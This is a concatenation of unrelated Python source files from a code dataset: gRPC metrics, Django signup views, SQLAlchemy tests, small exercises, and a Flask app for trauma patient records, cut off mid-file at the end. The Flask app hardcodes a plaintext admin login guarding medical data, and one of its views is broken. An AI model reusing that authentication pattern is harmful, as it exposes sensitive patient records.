\n\n        def latency_wrapper(behavior, request_streaming, response_streaming):\n            def new_behavior(request_or_iterator, service_context):\n                start = default_timer()\n                try:\n                    rsp = behavior(request_or_iterator, service_context)\n                    if service_context._state.code is None:\n                        SERVER_HANDLED_COUNTER.labels(\n                            grpc_type=grpc_type,\n                            grpc_service=grpc_service,\n                            grpc_method=grpc_method,\n                            grpc_code=code_to_string(grpc.StatusCode.OK)\n                        ).inc()\n                    else:\n                        SERVER_HANDLED_COUNTER.labels(\n                            grpc_type=grpc_type,\n                            grpc_service=grpc_service,\n                            grpc_method=grpc_method,\n                            grpc_code=code_to_string(service_context._state.code)\n                        ).inc()\n                    return rsp\n                except grpc.RpcError as e:\n                    if isinstance(e, grpc.Call):\n                        SERVER_HANDLED_COUNTER.labels(\n                            grpc_type=grpc_type,\n                            grpc_service=grpc_service,\n                            grpc_method=grpc_method,\n                            grpc_code=code_to_string(e.code())\n                        ).inc()\n                    else:\n                        SERVER_HANDLED_COUNTER.labels(\n                            grpc_type=grpc_type,\n                            grpc_service=grpc_service,\n                            grpc_method=grpc_method,\n                            grpc_code=code_to_string(grpc.StatusCode.UNKNOWN)\n                        ).inc()\n                    raise e\n                finally:\n                    SERVER_HANDLED_LATENCY_SECONDS.labels(\n                        grpc_type=grpc_type,\n                        grpc_service=grpc_service,\n                        grpc_method=grpc_method).observe(max(default_timer() - start, 0))\n\n            return new_behavior\n\n        return _wrap_rpc_behavior(handler, latency_wrapper)\n\n\nclass ServiceLatencyInterceptor(grpc.ServerInterceptor):\n\n    def __init__(self):\n        pass\n\n    def intercept_service(self, continuation, handler_call_details):\n        client_call_method = handler_call_details.method\n        parts = client_call_method.split(\"/\")\n        grpc_service = parts[1]\n        grpc_method = parts[2]\n\n        def latency_wrapper(behavior, request_streaming, response_streaming):\n            def new_behavior(request_or_iterator, service_context):\n                start = time.time()\n                try:\n                    return behavior(request_or_iterator, service_context)\n                finally:\n                    SERVER_HANDLED_LATENCY_SECONDS.labels(\n                        grpc_type='UNARY',\n                        grpc_service=grpc_service,\n                        grpc_method=grpc_method).observe(max(time.time() - start, 0))\n\n            return new_behavior\n\n        return _wrap_rpc_behavior(continuation(handler_call_details), latency_wrapper)\n","sub_path":"python_grpc_prometheus/prometheus_server_interceptor.py","file_name":"prometheus_server_interceptor.py","file_ext":"py","file_size_in_byte":5318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"366214136","text":"cases = int(input())\n\nfor case in range(cases):\n    x1, y1, r1, x2, y2, r2 = [int(x) for x in input().split(' ')]\n\n    # if the two centers coincide\n    if x1 == x2 and y1 == y2:\n        if r1 == r2: # and the radii match too: infinitely many common points\n            print(-1)\n        else: # different radii: no common points at all\n            print(0)\n    else: # the centers differ\n        # the answer depends on the distance between the centers\n        distance = ((x1 - x2)**2 + (y1 - y2)**2)**.5\n\n        if r1 + r2 == distance or abs(r1 - r2) == distance:\n            print(1)\n        elif abs(r1 - r2) < distance < r1 + r2:\n            print(2)\n        else:\n            print(0)\n\n    continue\n","sub_path":"BOJ/1002/1002.py","file_name":"1002.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"156073059","text":"import chess\nimport numpy as np\n\nclass State(object):\n    def __init__(self, board=None):\n        if board is None:\n            self.board = chess.Board()\n        else:\n            self.board = board\n\n    def serialize(self):\n        assert self.board.is_valid()\n\n        bstate = np.zeros(64, np.uint8)\n        for i in range(64):\n            piece = self.board.piece_at(i)\n            if piece is not None:\n                print(piece)\n                pass\n        bstate = bstate.reshape(8,8)\n        \n        state = np.zeros((8, 8,5), np.uint8)\n\n        state[:,:, 0]= (bstate>>3)&1\n        state[:,:, 1]= (bstate>>2)&1\n        state[:,:, 2]= (bstate>>1)&1\n        state[:,:, 3]= (bstate>>0)&1\n\n        # state[self.board.ep_square, :, :, 3] = 1\n\n        state[:,:,4]= (self.board.turn * 1.0)\n\n        return state\n    \n    def edges(self):\n        return list(self.board.legal_moves)\n    \n    def value(self):\n        return 1\n\nif __name__ == \"__main__\":\n    s = State()\n    
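# Added note (illustrative): from the opening position edges() lists the 20\n    # legal first moves (16 pawn moves and 4 knight moves).\n    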
print(s.edges())\n\n","sub_path":"state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"300368941","text":"\r\ncours=lirecourslf(lnfppc)\r\nlcs=coursval(cours,'HERMES')\r\nmme(lcs,20)\r\np=[qi3macd,mt3macd(12,26,9)]\r\ncalculind3(lcs,p)\r\ncalculind4(lcs,p)\r\nmoyind(select,mme,14)\r\nmoyind(select,calculind4,p)\r\ntestind(select,mme,20)\r\n","sub_path":"src/pytrade/exbourseppc.py","file_name":"exbourseppc.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"62623795","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render, redirect\nfrom djangoproject.users.forms import SignUpForm, UserForm, ProfileForm\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.utils.encoding import force_bytes, force_text\nfrom django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode\nfrom django.template.loader import render_to_string\nfrom .tokens import account_activation_token\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import login\nfrom django.core.mail import send_mail\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom djangoproject.settings import EMAIL_HOST_USER\n\n\ndef signup(request):\n    if request.method == \"POST\":\n        form = SignUpForm(request.POST)\n\n        if form.is_valid():\n            user = form.save(commit=False)\n            user.is_active = False\n            user.save()\n\n            current_site = get_current_site(request)\n            subject = 'Activate your account.'\n            message = render_to_string('users/active_email.html', {\n                'user': user,\n                'domain': current_site.domain,\n                'uid': urlsafe_base64_encode(force_bytes(user.pk)),\n                'token': account_activation_token.make_token(user),\n            })\n            to_email = form.cleaned_data.get('email')\n\n            send_mail(\n                subject,\n                message,\n                EMAIL_HOST_USER,\n                [to_email],\n                html_message=message\n            )\n\n            return redirect('confirm_email_address')\n    else:\n        form = SignUpForm()\n    return render(request, 'users/signup.html', {'form': form})\n\n\ndef activate(request, uidb64, token):\n    try:\n        uid = force_text(urlsafe_base64_decode(uidb64))\n        user = User.objects.get(pk=uid)\n    except(TypeError, ValueError, OverflowError, User.DoesNotExist):\n        user = None\n    if user is not None and account_activation_token.check_token(user, token):\n        user.is_active = True\n        user.save()\n        login(request, user)\n        return redirect('signupsuccess')\n    else:\n        return redirect('signupdefeat')\n\n\ndef confirm_email_address(request):\n    return render(request, 'users/confirm_email_address.html')\n\n\ndef signupsuccess(request):\n    return render(request, 'users/signupsuccess.html')\n\n\ndef signupdefeat(request):\n    return render(request, 'users/signupdefeat.html')\n\n\n@login_required\ndef profile(request):\n    if request.method == 'POST':\n        user_form = UserForm(request.POST, instance=request.user)\n        profile_form = ProfileForm(\n            request.POST, request.FILES, instance=request.user.profile)\n        if user_form.is_valid() and profile_form.is_valid():\n            user_form.save()\n            profile_form.save()\n            messages.success(\n                request, ('Your profile was successfully updated!'))\n            return redirect('profile')\n        else:\n            messages.error(request, ('Please correct the error below.'))\n    else:\n        user_form = UserForm(instance=request.user)\n        profile_form = ProfileForm(instance=request.user.profile)\n    return render(request, 'users/profile.html', {\n        
'user_form': user_form,\n 'profile_form': profile_form\n })\n","sub_path":"djangoproject/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"14876767","text":"def gm(lst):\n nz = list(filter(lambda x: x != 0, lst))\n if len(nz) == 1: return nz[0]\n print(nz)\n print([bin(x)[2:] for x in nz])\n m = min(nz)\n idx = next((i for i in range(len(nz)) if nz[i] == m))\n new = []\n for i in filter(lambda y: y != idx, range(len(nz))):\n new += [nz[i] % m]\n new += [m]\n return gm(new)\n\n","sub_path":"70/hw/hw4_tests.py","file_name":"hw4_tests.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"492905682","text":"from datetime import date\nfrom django.db import models\nfrom django.db.models import F\n\nfrom auditable.models import Auditable\nfrom .account_balance import AccountBalance\nfrom .credit_class import CreditClass\nfrom .organization_address import OrganizationAddress\nfrom .user_profile import UserProfile\nfrom ..managers.organization import OrganizationManager\n\n\nclass Organization(Auditable):\n name = models.CharField(\n db_column=\"organization_name\",\n db_comment=\"Name of the organization\",\n max_length=500,\n null=False,\n unique=True\n )\n\n short_name = models.CharField(\n db_column='short_name',\n db_comment='Short version of the organization name, used in generating some reports',\n unique=True,\n null=True,\n max_length=64\n )\n\n is_active = models.BooleanField(\n default=False,\n db_comment=\"Boolean Field to see if the organization is disabled \"\n \"or not.\"\n )\n is_government = models.BooleanField(\n default=False,\n db_comment=\"Flag to check whether this is the Government organization\"\n )\n\n @property\n def balance(self):\n \"\"\"\n Gets the class A and B balance for the current\n organization\n \"\"\"\n balance = {'A': 0, 'B': 0}\n account_balances = AccountBalance.objects.filter(\n organization_id=self.id,\n expiration_date=None\n ).order_by('-id')\n\n credit_class = CreditClass.objects.filter(credit_class=\"A\").first()\n for account_balance in account_balances:\n if account_balance.credit_class_id == credit_class.id:\n balance['A'] = account_balance.balance\n else:\n balance['B'] = account_balance.balance\n return balance\n\n @property\n def members(self):\n \"\"\"\n Gets the list of user for the current organization\n \"\"\"\n data = UserProfile.objects.filter(\n organization_id=self.id\n ).order_by(\n 'display_name', 'first_name', 'last_name'\n )\n\n return data\n\n @property\n def organization_address(self):\n \"\"\"\n Gets the active address for the organization\n \"\"\"\n data = OrganizationAddress.objects.filter(\n effective_date__lte=date.today(),\n organization_id=self.id\n ).exclude(\n expiration_date__lte=date.today()\n ).exclude(\n expiration_date=F('effective_date')\n ).order_by('-effective_date', '-update_timestamp')\n\n return data\n\n class Meta:\n db_table = 'organization'\n\n objects = OrganizationManager()\n\n db_table_comment = \\\n \"Contains a list of all of the recognized Vehicle suppliers, both \" \\\n \"past and present, as well as an entry for the government which is \" \\\n \"also considered an 
organization.\"\n","sub_path":"backend/api/models/organization.py","file_name":"organization.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"377463491","text":"from team import *\n\nol=club('Olympique Lyonnais')\nt1=time.time()\nol.get_data()\nfor joueur in ol.liste_joueur:\n joueur.fill_dico()\n print (joueur.nom)\n\nt2=time.time()\nprint(t2-t1)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"113265075","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('cloudygames', '0016_auto_20160224_1934'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='gamesession',\n name='streaming_port',\n field=models.CharField(max_length=5, default=30000),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='playersavedata',\n name='is_autosaved',\n field=models.BooleanField(default=False),\n ),\n ]\n","sub_path":"cloudygames/migrations/0017_auto_20160304_0046.py","file_name":"0017_auto_20160304_0046.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"494824309","text":"from __future__ import print_function\nfrom app import app\nfrom flask import Flask, request, flash, render_template, url_for, redirect, session\nfrom app.forms import *\nfrom app.__init__ import db\nfrom app.models import *\nfrom config import dico_columns\nimport sys, pygal\n\n@app.route('/')\ndef index():\n if not session.get('logged_in'):\n return render_template('login.html')\n else:\n bar_chart = pygal.Bar()\n bar_chart.title = \"Etat de stress aigu\"\n bar_chart.add(\"Integrite physique atteinte\",[TraumaTable.query.filter_by(event=True).paginate().total])\n bar_chart.add(\"Peur, impuissance, horreur\", [TraumaTable.query.filter_by(reaction=True).paginate().total])\n bar_chart.add(\"Torpeur\", [TraumaTable.query.filter_by(dissociation1=True).paginate().total])\n bar_chart.add(\"Cause de l'environement reduite\", [TraumaTable.query.filter_by(dissociation2=True).paginate().total])\n bar_chart.add(\"Derealisation\", [TraumaTable.query.filter_by(dissociation3=True).paginate().total])\n bar_chart.add(\"Depersonnalisation\", [TraumaTable.query.filter_by(dissociation4=True).paginate().total])\n bar_chart.add(\"Amnesie dissociative\", [TraumaTable.query.filter_by(dissociation5=True).paginate().total])\n bar_chart.add(\"Images\", [TraumaTable.query.filter_by(rememoration1=True).paginate().total])\n bar_chart.add(\"Pensees\", [TraumaTable.query.filter_by(rememoration2=True).paginate().total])\n bar_chart.add(\"Reves\", [TraumaTable.query.filter_by(rememoration3=True).paginate().total])\n bar_chart.add(\"Illusions\", [TraumaTable.query.filter_by(rememoration4=True).paginate().total])\n bar_chart.add(\"Flash-back\", [TraumaTable.query.filter_by(rememoration5=True).paginate().total])\n bar_chart.add(\"Souffrance a l'exposition\", [TraumaTable.query.filter_by(rememoration6=True).paginate().total])\n bar_chart.add(\"Persistance des stimulis\", [TraumaTable.query.filter_by(evitement=True).paginate().total])\n bar_chart.add(\"Symptomes anxieux\", [TraumaTable.query.filter_by(anxiete=True).paginate().total])\n bar_chart.add(\"Activite neurovegetative\", 
[TraumaTable.query.filter_by(neurovegetatif=True).paginate().total])\n bar_chart.add(\"Detresse clinique\", [TraumaTable.query.filter_by(detresse_clinique=True).paginate().total])\n bar_chart.add(\"Alteration du fonctionnment\", [TraumaTable.query.filter_by(alteration=True).paginate().total])\n chart = bar_chart.render_data_uri()\n return render_template('index.html', table = InfoTable.query.all(), chart = chart)\n\n@app.route('/login', methods=['POST'])\ndef do_admin_login():\n if request.form['password'] == 'ESCRIMES' and request.form['username'] == 'MNYERRO':\n session['logged_in'] = True\n return render_template('login.html')\n else:\n return index()\n\n@app.route('/patient/')\n@app.route('/patient//')\ndef fichepatient(idpatient, modif=None):\n if not session.get('logged_in'):\n return render_template('login.html')\n else:\n return render_template('patient.html',\n patient = InfoTable.query.filter_by(id = idpatient).first(),\n facts = FactsTable.query.filter_by(info_id = idpatient).first(),\n trauma = TraumaTable.query.filter_by(info_id = idpatient).first(),\n info_id = idpatient,\n dico = dico_columns,\n modif = modif)\n\n\n@app.route('/form_info', methods = ['POST', 'GET'])\ndef info():\n if not session.get('logged_in'):\n return render_template('login.html')\n else:\n form = GeneralInfo()\n if request.method == 'POST':\n if form.validate() == False:\n flash('Formulaire mal rempli')\n return render_template('create_form.html', form = form, postlink = url_for('info'))\n else:\n info = InfoTable(firstname = form.data['firstname'],\n lastname = form.data['lastname'],\n date_of_birth = form.data['date_of_birth'],\n cellphone = form.data['cellphone'],\n adress = form.data['adress'],\n date_of_agression = form.data['date_of_agression'])\n db.session.add(info)\n db.session.commit()\n return redirect(url_for('index'))\n else:\n return render_template('create_form.html', form = form, postlink = url_for('info'))\n\n@app.route('/modify_info', methods = ['POST', 'GET'])\ndef modify_info():\n if not session.get('logged_in'):\n return render_template('login.html')\n else:\n form = GeneralInfo()\n if request.method == 'POST':\n if form.validate() == False:\n flash('Formulaire mal rempli')\n return render_template('create_form.html', form = form, postlink = url_for('info'))\n else:\n info = InfoTable(firstname = form.data['firstname'],\n lastname = form.data['lastname'],\n date_of_birth = form.data['date_of_birth'],\n cellphone = form.data['cellphone'],\n adress = form.data['adress'],\n date_of_agression = form.data['date_of_agression'])\n db.session.add(info)\n db.session.commit()\n return redirect(url_for('index'))\n else:\n return render_template('create_form.html', form = form, postlink = url_for('info'))\n\n\n@app.route('/form_facts/', methods = ['POST', 'GET'])\ndef facts(info_id):\n if not session.get('logged_in'):\n return render_template('login.html')\n else:\n form = Facts()\n if request.method == 'POST':\n if form.validate() == False:\n flash('Formulaire mal rempli')\n return render_template('create_form.html', form = form, postlink = url_for('facts', info_id=info_id))\n else:\n facts = FactsTable(info_id = info_id,\n facts = form.data['facts'],\n felt_peri_aggression = form.data['felt_peri_aggression'],\n felt_post_aggression = form.data['felt_post_aggression'],\n ressenti = form.data['ressenti'])\n db.session.add(facts)\n db.session.commit()\n return redirect(url_for('index'))\n else:\n return render_template('create_form.html', form = form, postlink = url_for('facts', 
info_id=info_id))\n\n@app.route('/form_trauma/<info_id>', methods = ['POST', 'GET'])\ndef trauma(info_id):\n    if not session.get('logged_in'):\n        return render_template('login.html')\n    else:\n        form = Trauma()\n        if request.method == 'POST':\n            if form.validate() == False:\n                flash(form.errors)\n                return render_template('create_form.html', form = form, postlink = url_for('trauma', info_id=info_id))\n            else:\n                trauma = TraumaTable(info_id = info_id,\n                    event = form.data['event'],\n                    reaction = form.data['reaction'],\n                    dissociation1 = form.data['dissociation1'],\n                    dissociation2 = form.data['dissociation2'],\n                    dissociation3 = form.data['dissociation3'],\n                    dissociation4 = form.data['dissociation4'],\n                    dissociation5 = form.data['dissociation5'],\n                    rememoration1 = form.data['rememoration1'],\n                    rememoration2 = form.data['rememoration2'],\n                    rememoration3 = form.data['rememoration3'],\n                    rememoration4 = form.data['rememoration4'],\n                    rememoration5 = form.data['rememoration5'],\n                    rememoration6 = form.data['rememoration6'],\n                    evitement = form.data['evitement'],\n                    anxiete = form.data['anxiete'],\n                    neurovegetatif = form.data['neurovegetatif'],\n                    detresse_clinique = form.data['detresse_clinique'],\n                    alteration = form.data['alteration'],\n                    perturbation = form.data['pertubation'])\n                db.session.add(trauma)\n                db.session.commit()\n                return redirect(url_for('index'))\n        else:\n            return render_template('create_form.html', form = form, postlink = url_for('trauma', info_id=info_id))\n\n@app.route('/delete/<patient>')\ndef deletepatient(patient):\n    if not session.get('logged_in'):\n        return render_template('login.html')\n    else:\n        sessioninfo = db.session.object_session(InfoTable.query.filter_by(id=patient).first())\n        fact = FactsTable.query.filter_by(info_id=patient).first()\n        trauma = TraumaTable.query.filter_by(info_id=patient).first()\n        sessioninfo.delete(InfoTable.query.filter_by(id=patient).first())\n        sessioninfo.commit()\n        if (fact):\n            sessionfact = db.session.object_session(fact)\n            sessionfact.delete(fact)\n            sessionfact.commit()\n        if (trauma):\n            sessiontrauma = db.session.object_session(trauma)\n            sessiontrauma.delete(trauma)\n            sessiontrauma.commit()\n    return redirect(url_for('index'))\n\n@app.route('/modify/<field>', methods=['POST', 'GET'])\ndef modifypatient(field):\n    #if (table == \"InfoTable\"):\n    #    user = InfoTable.query.filter_by(id=idpatient).first()\n    field = newval\n    return \"Salut\"\n\nif __name__ == '__main__':\n    db.create_all()\n    app.run(debug=True)\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":9562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"435269449","text":"class Node:\n\n    def __init__(self, value):\n        self.value = value # value stored in this node\n        self.next = None # reference to the next node\n\n\nclass List:\n\n    def __init__(self):\n        # head (sentinel) node\n        self.head = Node(-1)\n\n    # build a singly linked list by head insertion\n    def insert_before(self, data):\n        for i in data:\n            node = Node(i)\n\n            if self.head.next is None:\n                self.head.next = node\n            else:\n                node.next = self.head.next\n                self.head.next = node\n\n    # build a singly linked list by tail insertion\n    def insert_tail(self, data):\n\n        tail = self.head.next\n\n        for i in data:\n            node = Node(i)\n\n            if tail is None:\n                self.head.next = node\n                tail = node\n            else:\n                tail.next = node\n                tail = node\n\n    # print the linked list\n    def list_print(self):\n        node = self.head.next\n\n        while node:\n            print(node.value)\n            node = node.next\n\n    # empty the linked list\n    def list_clear(self):\n        self.head.next = None\n
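\n    # Added note (illustrative): insert_before([1, 2, 3]) yields 3 -> 2 -> 1,\n    # since each element is pushed at the head, while insert_tail([1, 2, 3])\n    # keeps the order 1 -> 2 -> 3.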
\n\n    # insert a node with the given value before the i-th node\n    def list_element_add(self, i, value):\n\n        node_new = Node(value)\n\n        index = 0\n\n        node = self.head.next\n\n        while node:\n            index = index + 1\n\n            if index == i - 1:\n                break\n\n            node = node.next\n\n        if node is None:\n            return False\n\n        node_new.next = node.next\n        node.next = node_new\n\n\nif __name__ == '__main__':\n    my_list = List()\n\n    my_list.insert_before([1, 2, 3, 4, 5])\n    my_list.list_print()\n\n    my_list.list_clear()\n\n    my_list.insert_tail([1, 2, 3, 4, 5])\n    my_list.list_print()\n\n    my_list.list_element_add(3, 10)\n    my_list.list_print()","sub_path":"1806101055-官学琦/day0317/test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"642398470","text":"# Implement the postfix form of the multiplication and addition operations using a stack.\n\n\nclass Stack:\n    def __init__(self):\n        self.items = []\n\n    def push(self, item):\n        self.items.append(item)\n\n    def pop(self):\n        return self.items.pop()\n\n    def count(self):\n        # Evaluate the stored tokens as a postfix expression: operands are\n        # pushed, '+' and '*' pop the two most recent operands and push the result.\n        stack = []\n        for item in self.items:\n            if item == '+':\n                y = stack.pop()\n                x = stack.pop()\n                stack.append(x + y)\n            elif item == '*':\n                y = stack.pop()\n                x = stack.pop()\n                stack.append(x * y)\n            else:\n                stack.append(item)\n        return stack.pop()\n\n\na = Stack()\na.push(1)\na.push(2)\na.push(3)\na.push('+')\na.push('*')\nprint(a.items)\nprint(a.count())\n","sub_path":"data_structures/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"507610872","text":"from __future__ import annotations\n\nfrom decimal import Decimal\nfrom typing import List\nfrom typing import Optional\nfrom typing import Set\nfrom typing import TYPE_CHECKING\nfrom typing import TypeVar\nfrom typing import Union\nimport uuid\n\nfrom sqlalchemy import Column\nfrom sqlalchemy import exc\nfrom sqlalchemy import ForeignKey\nfrom sqlalchemy import Integer\nfrom sqlalchemy import Numeric\nfrom sqlalchemy import select\nfrom sqlalchemy import String\nfrom sqlalchemy import Table\nfrom sqlalchemy import testing\nfrom sqlalchemy import Uuid\nfrom sqlalchemy.orm import attribute_keyed_dict\nfrom sqlalchemy.orm import DeclarativeBase\nfrom sqlalchemy.orm import DynamicMapped\nfrom sqlalchemy.orm import KeyFuncDict\nfrom sqlalchemy.orm import Mapped\nfrom sqlalchemy.orm import mapped_column\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy.orm import WriteOnlyMapped\nfrom sqlalchemy.testing import expect_raises_message\nfrom sqlalchemy.testing import is_\nfrom sqlalchemy.testing import is_false\nfrom sqlalchemy.testing import is_true\nfrom sqlalchemy.util import compat\nfrom .test_typed_mapping import expect_annotation_syntax_error\nfrom .test_typed_mapping import MappedColumnTest as _MappedColumnTest\nfrom .test_typed_mapping import RelationshipLHSTest as _RelationshipLHSTest\nfrom .test_typed_mapping import (\n    WriteOnlyRelationshipTest as _WriteOnlyRelationshipTest,\n)\n\n\"\"\"runs the annotation-sensitive tests from test_typed_mappings while\nhaving ``from __future__ import annotations`` in effect.\n\n\"\"\"\n\n\n_R = TypeVar(\"_R\")\n\nM = Mapped\n\n\nclass M3:\n    pass\n\n\nclass MappedColumnTest(_MappedColumnTest):\n    def test_indirect_mapped_name_module_level(self, decl_base):\n        \"\"\"test #8759\n\n\n        Note that M by definition has to be at the module level to be\n        valid, and not locally declared here, this is in accordance with\n        mypy::\n\n\n            def make_class() -> None:\n                ll = list\n\n                x: ll[int] = [1, 2, 3]\n\n        Will return::\n\n            $ mypy test3.py\n            test3.py:4: 
error: Variable \"ll\" is not valid as a type [valid-type]\n test3.py:4: note: See https://mypy.readthedocs.io/en/stable/common_issues.html#variables-vs-type-aliases\n Found 1 error in 1 file (checked 1 source file)\n\n Whereas the correct form is::\n\n ll = list\n\n def make_class() -> None:\n\n x: ll[int] = [1, 2, 3]\n\n\n \"\"\" # noqa: E501\n\n class Foo(decl_base):\n __tablename__ = \"foo\"\n\n id: M[int] = mapped_column(primary_key=True)\n\n data: M[int] = mapped_column()\n\n data2: M[int]\n\n self.assert_compile(\n select(Foo), \"SELECT foo.id, foo.data, foo.data2 FROM foo\"\n )\n\n def test_indirect_mapped_name_local_level(self, decl_base):\n \"\"\"test #8759.\n\n this should raise an error.\n\n \"\"\"\n\n M2 = Mapped\n\n with expect_raises_message(\n exc.ArgumentError,\n r\"Could not interpret annotation M2\\[int\\]. Check that it \"\n \"uses names that are correctly imported at the module level.\",\n ):\n\n class Foo(decl_base):\n __tablename__ = \"foo\"\n\n id: M2[int] = mapped_column(primary_key=True)\n\n data2: M2[int]\n\n def test_indirect_mapped_name_itswrong(self, decl_base):\n \"\"\"test #8759.\n\n this should raise an error.\n\n \"\"\"\n\n with expect_annotation_syntax_error(\"Foo.id\"):\n\n class Foo(decl_base):\n __tablename__ = \"foo\"\n\n id: M3[int] = mapped_column(primary_key=True)\n\n data2: M3[int]\n\n def test_unions(self):\n our_type = Numeric(10, 2)\n\n class Base(DeclarativeBase):\n type_annotation_map = {Union[float, Decimal]: our_type}\n\n class User(Base):\n __tablename__ = \"users\"\n __table__: Table\n\n id: Mapped[int] = mapped_column(primary_key=True)\n\n data: Mapped[Union[float, Decimal]] = mapped_column()\n reverse_data: Mapped[Union[Decimal, float]] = mapped_column()\n\n optional_data: Mapped[\n Optional[Union[float, Decimal]]\n ] = mapped_column()\n\n # use Optional directly\n reverse_optional_data: Mapped[\n Optional[Union[Decimal, float]]\n ] = mapped_column()\n\n # use Union with None, same as Optional but presents differently\n # (Optional object with __origin__ Union vs. 
Union)\n reverse_u_optional_data: Mapped[\n Union[Decimal, float, None]\n ] = mapped_column()\n\n float_data: Mapped[float] = mapped_column()\n decimal_data: Mapped[Decimal] = mapped_column()\n\n if compat.py310:\n pep604_data: Mapped[float | Decimal] = mapped_column()\n pep604_reverse: Mapped[Decimal | float] = mapped_column()\n pep604_optional: Mapped[\n Decimal | float | None\n ] = mapped_column()\n pep604_data_fwd: Mapped[\"float | Decimal\"] = mapped_column()\n pep604_reverse_fwd: Mapped[\"Decimal | float\"] = mapped_column()\n pep604_optional_fwd: Mapped[\n \"Decimal | float | None\"\n ] = mapped_column()\n\n is_(User.__table__.c.data.type, our_type)\n is_false(User.__table__.c.data.nullable)\n is_(User.__table__.c.reverse_data.type, our_type)\n is_(User.__table__.c.optional_data.type, our_type)\n is_true(User.__table__.c.optional_data.nullable)\n\n is_(User.__table__.c.reverse_optional_data.type, our_type)\n is_(User.__table__.c.reverse_u_optional_data.type, our_type)\n is_true(User.__table__.c.reverse_optional_data.nullable)\n is_true(User.__table__.c.reverse_u_optional_data.nullable)\n\n is_(User.__table__.c.float_data.type, our_type)\n is_(User.__table__.c.decimal_data.type, our_type)\n\n if compat.py310:\n for suffix in (\"\", \"_fwd\"):\n data_col = User.__table__.c[f\"pep604_data{suffix}\"]\n reverse_col = User.__table__.c[f\"pep604_reverse{suffix}\"]\n optional_col = User.__table__.c[f\"pep604_optional{suffix}\"]\n is_(data_col.type, our_type)\n is_false(data_col.nullable)\n is_(reverse_col.type, our_type)\n is_false(reverse_col.nullable)\n is_(optional_col.type, our_type)\n is_true(optional_col.nullable)\n\n def test_typ_not_in_cls_namespace(self, decl_base):\n \"\"\"test #8742.\n\n This tests that when types are resolved, they use the ``__module__``\n of they class they are used within, not the mapped class.\n\n \"\"\"\n\n class Mixin:\n id: Mapped[int] = mapped_column(primary_key=True)\n data: Mapped[uuid.UUID]\n\n class MyClass(Mixin, decl_base):\n # basically no type will be resolvable here\n __module__ = \"some.module\"\n __tablename__ = \"mytable\"\n\n is_(MyClass.id.expression.type._type_affinity, Integer)\n is_(MyClass.data.expression.type._type_affinity, Uuid)\n\n\nclass MappedOneArg(KeyFuncDict[str, _R]):\n pass\n\n\nclass RelationshipLHSTest(_RelationshipLHSTest):\n def test_bidirectional_literal_annotations(self, decl_base):\n \"\"\"test the 'string cleanup' function in orm/util.py, where\n we receive a string annotation like::\n\n \"Mapped[List[B]]\"\n\n Which then fails to evaluate because we don't have \"B\" yet.\n The annotation is converted on the fly to::\n\n 'Mapped[List[\"B\"]]'\n\n so that when we evaluated it, we get ``Mapped[List[\"B\"]]`` and\n can extract \"B\" as a string.\n\n \"\"\"\n\n class A(decl_base):\n __tablename__ = \"a\"\n\n id: Mapped[int] = mapped_column(primary_key=True)\n data: Mapped[str] = mapped_column()\n bs: Mapped[List[B]] = relationship(back_populates=\"a\")\n\n class B(decl_base):\n __tablename__ = \"b\"\n id: Mapped[int] = mapped_column(Integer, primary_key=True)\n a_id: Mapped[int] = mapped_column(ForeignKey(\"a.id\"))\n\n a: Mapped[A] = relationship(\n back_populates=\"bs\", primaryjoin=a_id == A.id\n )\n\n a1 = A(data=\"data\")\n b1 = B()\n a1.bs.append(b1)\n is_(a1, b1.a)\n\n def test_collection_class_uselist_implicit_fwd(self, decl_base):\n class A(decl_base):\n __tablename__ = \"a\"\n\n id: Mapped[int] = mapped_column(primary_key=True)\n data: Mapped[str] = mapped_column()\n bs_list: Mapped[List[B]] = relationship( # 
